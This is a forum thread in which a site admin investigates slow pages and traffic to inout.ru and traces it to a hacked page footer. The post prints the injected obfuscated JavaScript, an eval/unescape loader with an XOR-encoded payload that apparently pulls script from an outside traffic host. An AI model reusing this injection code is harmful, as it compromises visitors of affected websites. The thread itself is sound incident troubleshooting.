http://inout.ru - Should I be worried?

[dubbers]

Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?

The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?

[PhilT]

Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?

This is the third report of suspicious urls when surfing the site. As far as I can tell the site is secure, so this points the finger at external content (Only GoogleAds, and Audi).

The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?

The only way this is possible is if Google has linked through.

What I would suggest is to minimise the Google Ads by clicking this icon at the top of the content

If anybody sees any activity that they are not comfortable with, please email screenshots, logs, etc to crew@rs246.com.[/img]

[PhilT]

Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?

This is the third report of suspicious urls when surfing the site. As far as I can tell the site is secure, so this points the finger at external content (Only GoogleAds, and Audi).

The whois info looks harmless enough, and the website (above) doesnt look too dodgy. But have the russians become ad providers for rs246?

The only way this is possible is if Google has linked through.

What I would suggest is to minimise the Google Ads by clicking this icon at the top of the content

If anybody sees any activity that they are not comfortable with, please email screenshots, logs, etc to crew@rs246.com.[/img]

Well, I was wrong. I found the source of the issue, and trying to figure out how it got in.

I know some of you out there are savvy with this, so any feedback appreciated on how this managed to get embedded into the page footer:

Code: Select all

<script Language="JavaScript">eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%3D%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%34%3B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d("8wgvmtp$hejcqeca9&NereWgvmtp&:rev$lpih$9$##?lpih$/9$#8wgv#$/$#mtp$hejcqeca9&NereWgvmtp&$#?lpih$/9$#wvg9&lppt>++`mwt)#$/$Iepl*vkqj`,5$/$Iepl*vej`ki,-$.$0-?lpih$/9$#*vmglpvebbmg*vq+p`w*nw&:8+wgv#$/$#mtp:#?`kgqiajp*svmpa,lpih-?8+wgvmtp:");</script>

[Nige_RS4]

Take a read of this post Phil ... http://www.jaguarpc.com/forums/showthre ... 067&page=4

You should check ALL index.html, default.php & index.php files for this code.

It suggests your server security has been compromised by a hacker - usually by injecting scripts over FTP?

One of the ISP's I deal with got hacked (over 300 sites were taken down / affected). They implemented SuPHP within a few days to try and restrict this happening again.

[Nige_RS4]

These might help as well ...
http://www.post1.net/lowem/entry/wsxhos ... _injection
http://www.phpbb.com/community/viewtopi ... &t=1301085

Happy reading

[PhilT]

That's what I don't understand.... We only allow http through the firewall.

I'm trawling the logs to see if I can find the injection.

[PhilT]

Well I found it. The good news is that the only activity that occured was the injection into the footer.

The good news is I've figured out what it is doing, and have taken steps to limit it happening again. I've yet to find the root cause.

[PhilT]

Happened on Christmas day, feckers!!

On Dec 25, 2008 at 06:04 PM the PostNuke code has detected that somebody tried to send information to your site that may have been intended as a hack.

[PhilT]

Just to let you know that this is now fixed... The code has been fixed.

[PhilT]

To try to minimise further risk, I'm working through some upgrades:

Forum - Done
Gallery - Done
CMS - Pending